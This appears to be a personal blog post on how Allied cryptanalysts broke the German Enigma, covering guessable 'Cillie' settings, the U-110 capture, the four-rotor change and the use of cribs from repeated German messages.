Part of the first class encryption of the Enigma was the possibility for the clerk to make up his own six-letter settings. This led to the Polish cryptanalysts occasionally being able to guess the settings. The military did not allow an obvious setting such as ABC. However, cipher clerks sometimes chose settings like QWE (the first three letters on the keyboard) or names. In the example above, if the first three letters were HIT, the cryptanalysts could guess that KOS and RLB were the ciphers to LER, spelling out HITLER. BER was usually followed by the ciphers of LIN. One particular German code clerk continually used his girlfriend’s name, Cillie, for his messages, and so these easy-to-guess indicators became known as "Cillies."

After the English had boarded the U-110 [thanks Fritz-Julius Lemp for being a pussy!] and got their hands on a working Enigma [with all dials in the correct setting for the whole month], they were able to destroy lots of U-boats that were decimating the US-UK ships. Admiral Doenitz just knew something was wrong and made a change by adding a thin fourth rotor between the leftmost rotor and the reflecting plate.

Bletchley Park learned of the impending change from decrypts and captured material, but until it was actually implemented there was little they could do to prepare. Fortunately, the Germans made an error. In December 1941, before the change had been made official, a U-boat sent a message using the four-rotor machine. To compound the mistake, the same message was retransmitted using only three rotors. From this seemingly innocuous error, the cryptanalysts at BP determined the wiring of the fourth rotor. :P

In order to set up the U.S. Navy Bombe, cryptanalysts first had to determine a "crib." A crib is the unenciphered text that is assumed, or known, to appear in the message.

Cribs could come through a variety of methods. Some of the best cribs came from errors made by the Germans themselves. On more than one occasion, a German signal clerk sent the same message twice in two different codes. If the code for one was known, it provided a crib for the unknown system.

Another frequent German mistake came in standardized messages. For example, a shore weather station in the Bay of Biscay sent out a message every day at 07:00 which began, "The weather in the Bay of Biscay will be. . . ." Knowing the exact wording of a message made a perfect crib for the Allies, so it became a high priority to intercept the daily message from this weather station.

A final example of a common German error involved the practice of submerged U-boats. When the submarines resurfaced after extended periods of time under water, they requested all the important messages they had missed while below the waves. The transmissions that followed inevitably involved communications previously sent and deciphered. Cryptanalysts merely checked the back files for messages with the same number of letter groups and used them as cribs for the new message. Since the resulting message would be identical to the previous one, it helped reveal the Enigma setting for the current day. With the daily setting, all the current day's messages could be read.

Other cribs came from knowing the current activities of the enemy. If, for example, a battle occurred, it could be assumed that messages following the attack reported on the battle. It was more difficult for the cryptanalysts to build cribs for these types of messages since it involved guesswork.

Because the Enigma rotors moved with each keystroke, a letter typed twice usually enciphered to two different letters. Also, the Enigma could not encrypt a letter to itself. Finally, the Germans indicated a space between words with the letter X and spelled out numbers.

Knowing these details played an important role in ultimately breaking the Enigma's daily settings.

Now why do we see these same weaknesses made over and over again?

Some time ago there was one for sale too. Damn, that would have been the hottest geek present ever. Prices have not been too extreme either...

Tuesday, 8 April 2008

Improvised Explosive Device 2